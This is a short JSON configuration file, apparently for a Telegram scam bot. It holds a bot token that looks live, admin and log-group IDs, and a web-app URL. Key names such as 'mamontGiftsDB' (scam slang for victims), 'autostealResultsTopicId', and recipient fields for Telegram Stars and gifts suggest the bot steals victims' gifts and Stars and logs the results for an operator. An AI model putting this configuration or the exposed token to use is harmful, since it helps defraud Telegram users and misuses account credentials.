{
  "botToken": "8449178438:AAEM_fTT-JryiNyL4KCUDOOj0woICw7Qv4c",
  "webUrl": "markettochkaapp.bothost.ru",
  "recipientUsername": "@withoutstressing",
  "remainingStarsRecipient": "@withoutstressing",
  "apiId": 2,
  "photourl": "https://",
  "apiHash": "1",
  "marketWebAppUrl": "https://",
  "mamontGiftsDB": "mamont-gifts.json",
  "adminId": 255838684,
  "logGroupId": -1003128707873,
  "logTopicId": 1,
  "autostealResultsTopicId": 4,
  "BOT_TOKEN": "7",
  "starsChannelId": -1,
  "starsMessageId": -1
}